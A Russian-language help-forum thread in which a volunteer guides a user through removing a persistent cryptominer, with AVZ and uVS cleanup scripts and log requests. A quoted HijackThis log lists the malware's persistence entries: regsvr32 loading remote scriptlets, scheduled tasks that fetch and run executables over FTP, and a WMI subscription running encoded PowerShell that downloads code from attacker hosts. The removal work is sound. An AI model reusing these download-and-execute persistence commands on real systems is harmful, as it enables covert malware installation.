Werero Опубликовано 12 января, 2019 Опубликовано 12 января, 2019 (изменено) Пытался всеми способами удалить вирус, запускал в безопасном режиме, чистил следы в реестре что мог найти, он всегда возобновляется, пытался даже переименовать его что бы он якобы оставался в системе но уже не делал тех функций зачем он создан, он даже после этого создался и получилось с каждого файла по 2 мой измененный фейк и новый настоящий. Еще в автозагрузке системы стоит элемент под название "операционная система", оно не отключается и после перезапуска всегда включено, нашел путь в реестре, если изменить изменить двоичные данные получаются китайские иероглифы, которые в свойствах того же conhost. KVRT и Dr. Webb curelt их находит, удаляет и после перезапуска оно снова появляется. Сделал пару скринов и прикреплю логи. CollectionLog-2019.01.12-17.35.zip Изменено 12 января, 2019 пользователем Werero
regist Опубликовано 12 января, 2019 Опубликовано 12 января, 2019 Здравствуйте!Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.Выполните скрипт в АВЗ (Файл - Выполнить скрипт): begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); SearchRootkit(true, true); SetAVZGuardStatus(True); ClearQuarantineEx(true); TerminateProcessByName('c:\windows\temp\conhost.exe'); QuarantineFile('a.exe', ''); QuarantineFile('c:\windows\debug\item.dat>', ''); QuarantineFile('c:\windows\debug\item.dat', ''); QuarantineFile('c:\windows\debug\ok.dat', ''); QuarantineFile('c:\windows\temp\conhost.exe', ''); DeleteFile('c:\windows\debug\item.dat>', '32'); DeleteFile('c:\windows\debug\item.dat', '32'); DeleteFile('c:\windows\debug\ok.dat', '32'); DeleteFile('c:\windows\temp\conhost.exe', ''); DeleteSchedulerTask('Mysa'); DeleteSchedulerTask('Mysa1'); DeleteSchedulerTask('Mysa2'); DeleteSchedulerTask('ok'); RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start', 'command', '32'); RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start', '32'); BC_ImportALL; ExecuteSysClean; ExecuteWizard('SCU', 2, 3, true); BC_Activate; RebootWindows(true); end. После выполнения скрипта компьютер перезагрузится.После перезагрузки:- Выполните в АВЗ:begin CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); end. - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.comПолученный ответ сообщите здесь (с указанием номера KLAN) Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. В первом диалоговом окне нажмите ОК, удерживая нажатой клавишу Shift. + Загрузите GMER по одной из указанных ссылок:Gmer со случайным именем (рекомендуется), Gmer в zip-архиве (перед применением распаковать в отдельную папку) Временно отключите драйверы эмуляторов дисков. Запустите программу (пользователям Vista/Seven запускать от имени Администратора по правой кнопке мыши). Начнется экспресс-проверка. Если появится окно с сообщением о деятельности руткита, нажмите No. Из всех дисков оставьте отмеченным только системный диск (обычно C:\) Нажмите на кнопку Scan и дождитесь окончания проверки. При появлении окна с сообщением о деятельности руткита, нажмите OK. После окончания проверки сохраните его лог (нажмите на кнопку Save) и вложите в сообщение. !!! Обратите внимание , что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора , при необходимости укажите пароль администратора и нажмите "Да" . Подробную инструкцию читайте в руководстве.
Werero Опубликовано 12 января, 2019 Автор Опубликовано 12 января, 2019 1.После удаления первым скриптом и перезапуска пк появилась та же ошибка что и каждый раз после попытки удаления, все файлы снова возобновились, ошибка:RunDLL:Возникла ошибка при запуске C:\Windows\debug\item.datНе найден указанный модульПосле этого все файлы восстанавливаются.2.Re: [KLAN-9443364848] Благодарим за обращение в Антивирусную Лабораторию Присланные вами файлы были проверены в автоматическом режиме. В следующих файлах обнаружен вредоносный код: conhost.exe - Trojan.Win64.Miner.ijc Файлы переданы на исследование. Если результат исследования изменится, мы дополнительно сообщим вам по электронной почте. Это сообщение сформировано автоматической системой обработки писем. Пожалуйста, не отвечайте на него. Антивирусная Лаборатория, Kaspersky Lab HQ 3.Повторные логи и GMER ниже прикреплю CollectionLog-2019.01.12-19.28.zip GMER.log
regist Опубликовано 12 января, 2019 Опубликовано 12 января, 2019 Здравствуйте!Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.Выполните скрипт в АВЗ (Файл - Выполнить скрипт): begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); SearchRootkit(true, true); SetAVZGuardStatus(True); ClearQuarantineEx(true); TerminateProcessByName('c:\windows\temp\conhost.exe'); QuarantineFile('a.exe', ''); QuarantineFile('c:\windows\debug\item.dat>', ''); QuarantineFile('c:\windows\debug\item.dat', ''); QuarantineFile('c:\windows\debug\ok.dat', ''); QuarantineFile('c:\windows\temp\conhost.exe', ''); DeleteFile('c:\windows\debug\item.dat>', '32'); DeleteFile('c:\windows\debug\item.dat', '32'); DeleteFile('c:\windows\debug\ok.dat', '32'); DeleteFile('c:\windows\temp\conhost.exe', ''); DeleteSchedulerTask('Mysa'); DeleteSchedulerTask('Mysa1'); DeleteSchedulerTask('Mysa2'); DeleteSchedulerTask('ok'); RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start', '32'); BC_ImportALL; ExecuteSysClean; ExecuteWizard('SCU', 2, 3, true); BC_Activate; RebootWindows(true); end. После выполнения скрипта компьютер перезагрузится.После перезагрузки:- Выполните в АВЗ:begin CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); end. - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.comПолученный ответ сообщите здесь (с указанием номера KLAN) "Пофиксите" в HijackThis (некоторые строки могут отсутствовать): O4 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.1226bye.xyz:280/v.sct scrobj.dll O4 - HKU\S-1-5-19\..\Run: [Sidebar] = C:\Program Files\Windows Sidebar\Sidebar.exe /autoRun (file missing) O4 - HKU\S-1-5-20\..\Run: [Sidebar] = C:\Program Files\Windows Sidebar\Sidebar.exe /autoRun (file missing) O4 - MSConfig\startupreg: CCleaner Monitoring [command] = (HKCU) (2018/08/27) (no file) O4 - MSConfig\startupreg: CCleaner Smart Cleaning [command] = (HKCU) (2018/10/27) (no file) O4 - MSConfig\startupreg: DAEMON Tools Pro Agent [command] = (HKCU) (2018/06/16) (no file) O4 - MSConfig\startupreg: Java x86 applicate [command] = (HKCU) (2018/06/01) (no file) O4 - MSConfig\startupreg: start [command] = (HKLM) (2019/01/12) (no file) O7 - IPSec: Name: win (2019/01/12) - {d6f9692f-2683-44a2-9165-44aa2dd03941} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2019/01/12) - {d6f9692f-2683-44a2-9165-44aa2dd03941} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2019/01/12) - {d6f9692f-2683-44a2-9165-44aa2dd03941} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2019/01/12) - {d6f9692f-2683-44a2-9165-44aa2dd03941} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2019/01/12) - {d6f9692f-2683-44a2-9165-44aa2dd03941} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe O22 - Task: Opera scheduled Autoupdate 1515162180 - C:\Program Files\Opera\launcher.exe --scheduledautoupdate $(Arg0) O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa O25 - WMI Event: fuckyoumm4 - fuckyoumm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host/1.txt scrobj.dll®svr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll®svr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll Скачайте архив TDSSKiller.zip и распакуйте его в отдельную папку; Запустите файл TDSSKiller.exe. Нажмите кнопку "Начать проверку". Не меняйте настройки сканирования по умолчанию. В процессе проверки могут быть обнаружены объекты двух типов: вредоносные (точно было установлено, какой вредоносной программой поражен объект); подозрительные (тип вредоносного воздействия точно установить невозможно). [*]По окончании проверки утилита выводит список обнаруженных объектов с их подробным описанием. [*]Для вредоносных объектов утилита автоматически определяет действие: Лечить или Удалить. [*]Для подозрительных объектов утилита предоставляет выбор действия пользователю (по умолчанию Пропустить). [*]Самостоятельно без указания консультанта ничего не удаляйте!!! [*]После нажатия кнопки Продолжить утилита выполняет выбранные действия и выводит результат. [*]Прикрепите лог утилиты к своему следующему сообщению По умолчанию утилита выводит отчет работы в корень системного диска (диска, на котором установлена операционная система, как правило, это диск С:\).Имя отчета имеет следующий вид: ИмяУтилиты.Версия_Дата_Время_log.txtНапример, C:\TDSSKiller.3.0.0.44_10.05.2015_13.39.01_log.txt Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. В первом диалоговом окне нажмите ОК, удерживая нажатой клавишу Shift.
Werero Опубликовано 12 января, 2019 Автор Опубликовано 12 января, 2019 1. Выполнил снова этот скрипт, все так же после перезапуска появилось2. Re: [KLAN-9444027882] Благодарим за обращение в Антивирусную Лабораторию Присланные вами файлы были проверены в автоматическом режиме. В следующих файлах обнаружен вредоносный код: conhost.exe - Trojan.Win64.Miner.ijc Файлы переданы на исследование. Если результат исследования изменится, мы дополнительно сообщим вам по электронной почте. Это сообщение сформировано автоматической системой обработки писем. Пожалуйста, не отвечайте на него. Антивирусная Лаборатория, Kaspersky Lab HQ3. Пофиксил4. Почему-то угроз не обнаружено, вот логи. Еще один лог, забыл сразу Туплю с форумом, простите. TDSSKiller.3.1.0.25_12.01.2019_22.37.06_log.txt CollectionLog-2019.01.12-22.57.zip
regist Опубликовано 12 января, 2019 Опубликовано 12 января, 2019 Здравствуйте!1) Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.Выполните скрипт в АВЗ (Файл - Выполнить скрипт): begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); SearchRootkit(true, true); SetAVZGuardStatus(True); ClearQuarantineEx(true); TerminateProcessByName('c:\windows\temp\conhost.exe'); QuarantineFile('c:\windows\temp\conhost.exe', ''); DeleteFile('c:\windows\temp\conhost.exe', ''); BC_ImportALL; ExecuteSysClean; ExecuteWizard('SCU', 2, 2, true); BC_Activate; RebootWindows(true); end. После выполнения скрипта компьютер перезагрузится. 2) - Перетащите лог Check_Browsers_LNK.log из папки AutoLogger\CheckBrowsersLNK на утилиту ClearLNK. Отчёт о работе прикрепите.3) Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. В первом диалоговом окне нажмите ОК, удерживая нажатой клавишу Shift. 4) Пополните, пожалуйста, базу безопасных файлов антивирусной утилиты AVZ: Запустите AVZ. Запустите используемый в Вашей системе интернет-браузер (например Internet Explorer, FireFox, Opera и т.д. - если применяется несколько браузеров, то необходимо запустить их все для того чтобы AVZ смог проанализировать используемые браузерами модули расширения и плагины) В AVZ выберите пункт меню Файл - Стандартные скрипты. В открывшемся окне необходимо отметить скрипт №8 ("VirusInfo.Info: Скрипт сбора файлов для экспресс-анализа ПК") и нажать кнопку "Выполнить отмеченные скрипты". Выполнение скрипта займет некоторое время, порядка 1 - 5 мин. В результате в папке AVZ будет создан подкаталог LOG, в нем архив с именем virusinfo_files_<имя_ПК>.zip Закачайте полученный архив, как описано на этой странице. Если размер архива превышает 250 Мб закачайте его на любой файлообменник, не требующий ввода капчи (например: Яндекс.Диск, Zippyshare, My-Files.RU, karelia.ru, Ge.tt или WebFile) и укажите ссылку на скачивание в своём следующем сообщении. 5) Проверьте, что с проблемой? + SpyHunter4 [2019/01/11 13:37:06]-->C:\Program Files\SpyHunter\Удалить SpyHunter.exe деинсталируйте.
Werero Опубликовано 12 января, 2019 Автор Опубликовано 12 января, 2019 1. Выполнение скрипта завершилось и после был неккоректный перезапуск, черный экран пришлось перезапускать вручную через блок питания, думаю скрипт завершился правильно, после перезапуска файл был удален но после конечно же возобновился2. Все логи ниже будут3. Закачал файл4. Удалил spyhunter ClearLNK-2019.01.13_00.08.49.log CollectionLog-2019.01.13-00.17.zip
regist Опубликовано 13 января, 2019 Опубликовано 13 января, 2019 Скачайте AutorunsVTchecker. Распакуйте и запустите. Не дожидаясь окончания сканирования, Скачайте Universal Virus Sniffer (uVS) Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем". Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе. !!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip , то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную. Дождитесь окончания работы программы и прикрепите лог к посту в теме. !!! Обратите внимание , что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора , при необходимости укажите пароль администратора и нажмите "Да" .
Werero Опубликовано 13 января, 2019 Автор Опубликовано 13 января, 2019 (изменено) 1. Скачал AutorunsVTchekcker, проверка закончилась, но вы не сказали нужно ли прикреплять логи этой программы и есть ли они вообще, если да то я не знаю в каком месте они хранятся, не вижу в папке с программой2. Все сделал, логи внизу ВОВА-ПК_2019-01-13_12-30-46_v4.1.2.7z Изменено 13 января, 2019 пользователем Werero
regist Опубликовано 13 января, 2019 Опубликовано 13 января, 2019 но вы не сказали нужно ли прикреплять логи этой программы и есть ли они вообще про это указано в описание утилиты по ссылке (логов нет). Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем". Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:;uVS v4.1.2 [http://dsrt.dyndns.org] ;Target OS: NTv6.1 v400c BREG ;---------command-block--------- delref S.DAT delref F:\DMC.DEVIL.MAY.CRY.VIRGILS.DOWNFALL.DLC.EXE zoo %SystemDrive%\USERS\3C5C~1\APPDATA\LOCAL\TEMP\CHROME_BITS_1976_25556\4908_ALL_CRL-SET-11285574569882646471.DATA.CRX3 delall %SystemDrive%\USERS\3C5C~1\APPDATA\LOCAL\TEMP\CHROME_BITS_1976_25556\4908_ALL_CRL-SET-11285574569882646471.DATA.CRX3 zoo %SystemDrive%\USERS\3C5C~1\APPDATA\LOCAL\TEMP\CHROME_BITS_1816_3900\A757E0B67A76B0BDDC240D42227C94F4F4AB29E9389B408A8481BF530A0FB946.CRXD delall %SystemDrive%\USERS\3C5C~1\APPDATA\LOCAL\TEMP\CHROME_BITS_1816_3900\A757E0B67A76B0BDDC240D42227C94F4F4AB29E9389B408A8481BF530A0FB946.CRXD delref HTTP://JS.1226BYE.XYZ:280/V.SCT delref %Sys32%\DRIVERS\09738533.SYS delref %Sys32%\DRIVERS\10457206.SYS delref %Sys32%\DRIVERS\19613695.SYS delref %Sys32%\DRIVERS\40198824.SYS delref %Sys32%\DRIVERS\53645255.SYS delref %Sys32%\DRIVERS\54770812.SYS delref %Sys32%\DRIVERS\57400693.SYS delref %Sys32%\DRIVERS\74282248.SYS delref %Sys32%\DRIVERS\91544570.SYS delref A.EXE delref PS&C:\WINDOWS\HELP\LSMOSEE.EXE zoo %SystemRoot%\DEBUG\ITEM.DAT delall %SystemRoot%\DEBUG\ITEM.DAT zoo %SystemRoot%\DEBUG\OK.DAT delall %SystemRoot%\DEBUG\OK.DAT delref S.RAR delref S&C:\WINDOWS\UPDATE.EXE delref WMI:\\.\ROOT\SUBSCRIPTION\__INTERVALTIMERINSTRUCTION\FUCKYOUMM2_ITIMER delref %SystemDrive%\USERS\ВОВА\DOWNLOADS\17XC39QR.EXE delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID] delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID] delref {8AD9C840-044E-11D1-B3E9-00805F499D93}\[CLSID] delref {88D969C3-F192-11D4-A65F-0040963251E5}\[CLSID] delref {88D969C0-F192-11D4-A65F-0040963251E5}\[CLSID] delref S&C:\WINDOWS\UPDATE.EXE delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.17\PSMACHINE.DLL delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID] delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID] delref {88D969C1-F192-11D4-A65F-0040963251E5}\[CLSID] delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID] delref {88D969C5-F192-11D4-A65F-0040963251E5}\[CLSID] delref {88D969C4-F192-11D4-A65F-0040963251E5}\[CLSID] delref {88D969C2-F192-11D4-A65F-0040963251E5}\[CLSID] delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID] delref {CA8A9780-280D-11CF-A24D-444553540000}\[CLSID] bl BF69865A3ACD3379B0A8D870CCD43618 113 zoo %SystemRoot%\WEB\N.VBS delall %SystemRoot%\WEB\N.VBS apply czoo restart В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..." Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен. После выполнения скрипта зайдите в папку, где распакована утилита uVS найдите архив, имя которого соответствует дате и времени запуска скрипта с префиксом ZOO_ (например: ZOO_2013-06-30_22-04-27.7z) Если архив отсутствует, то заархивруйте папку ZOO с паролем virus . Полученный архив отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма. после этого соберите свежий лог uVS.
Werero Опубликовано 13 января, 2019 Автор Опубликовано 13 января, 2019 Отправил архив по форме, вот логи ВОВА-ПК_2019-01-13_20-10-58_v4.1.2.7z
regist Опубликовано 13 января, 2019 Опубликовано 13 января, 2019 1) Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем". Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:;uVS v4.1.2 [http://dsrt.dyndns.org] ;Target OS: NTv6.1 v400c BREG deltmp ;---------command-block--------- delref S.DAT bl DB0E205613407C4E260BCB585270D8CD 782848 zoo %SystemRoot%\TEMP\CONHOST.EXE delall %SystemRoot%\TEMP\CONHOST.EXE delref HTTP://173.208.139.170/2.TXT delref HTTP://35.182.171.137/3.TXT delref HTTP://JS.1226BYE.XYZ:280/V.SCT delref HTTP://WMI.1217BYE.HOST/1.TXT delref A.EXE delref PS&C:\WINDOWS\HELP\LSMOSEE.EXE zoo %SystemRoot%\DEBUG\OK.DAT delall %SystemRoot%\DEBUG\OK.DAT delref S.RAR zoo %SystemRoot%\DEBUG\ITEM.DAT delall %SystemRoot%\DEBUG\ITEM.DAT delref S&C:\WINDOWS\UPDATE.EXE apply czoo restart В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..." Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен. После выполнения скрипта зайдите в папку, где распакована утилита uVS найдите архив, имя которого соответствует дате и времени запуска скрипта с префиксом ZOO_ (например: ZOO_2013-06-30_22-04-27.7z) Если архив отсутствует, то заархивруйте папку ZOO с паролем virus . Полученный архив отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма. 2) 1. Скачайте утилиту на рабочий стол.2. Запустите KVRT и подтвердите согласие с условиями использования3. Дождитесь завершения инициализации и в открывшемся окне нажмите на кнопку "Изменить параметры"4. В открывшемся меню, поставьте галочку напротив "Системный раздел" и нажмите [/b]"Ок"5. Нажмите кнопку "Начать проверку" для начала сканирования и пролечите все найденое.6. Дождитесь завершения сканирования и зайдите в папку C:\KVRT_Data\ (C:\ это обычно раздел, где установлена работающая версия Windows) и упакуйте папку Reports в архив и прикрепите к теме 3) Соберите свежий образ автозапуска uVS.
Werero Опубликовано 14 января, 2019 Автор Опубликовано 14 января, 2019 Все сделал ВОВА-ПК_2019-01-14_11-51-07_v4.1.2.7z Reports.rar
regist Опубликовано 14 января, 2019 Опубликовано 14 января, 2019 1) Выполните скрипт uVS ;uVS v4.1.2 [http://dsrt.dyndns.org] ;Target OS: NTv6.1 v400c BREG ;---------command-block--------- bl DB0E205613407C4E260BCB585270D8CD 782848 zoo %SystemRoot%\TEMP\CONHOST.EXE delall %SystemRoot%\TEMP\CONHOST.EXE delref HTTP://173.208.139.170/2.TXT delref HTTP://35.182.171.137/3.TXT delref HTTP://JS.1226BYE.XYZ:280/V.SCT delref S.DAT delref HTTP://WMI.1217BYE.HOST/1.TXT delref A.EXE delref S&C:\WINDOWS\UPDATE.EXE delref S.RAR zoo %SystemRoot%\DEBUG\ITEM.DAT delall %SystemRoot%\DEBUG\ITEM.DAT delref PS&C:\WINDOWS\HELP\LSMOSEE.EXE zoo %SystemRoot%\DEBUG\OK.DAT delall %SystemRoot%\DEBUG\OK.DAT apply czoo restart но скорее всего он опять не справится. 2) У вас Live CD/USB есть ? Если есть загрузить с него. Затем с него запустите uVS. В стартовом окне нажмите Выбрать каталог windows - укажите путь к папке со своей виндоус (заражённой) и соберите лог.
Werero Опубликовано 14 января, 2019 Автор Опубликовано 14 января, 2019 Помоему после выполнения скрипта вирус больше не появляется, я даже перезапускал пк
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти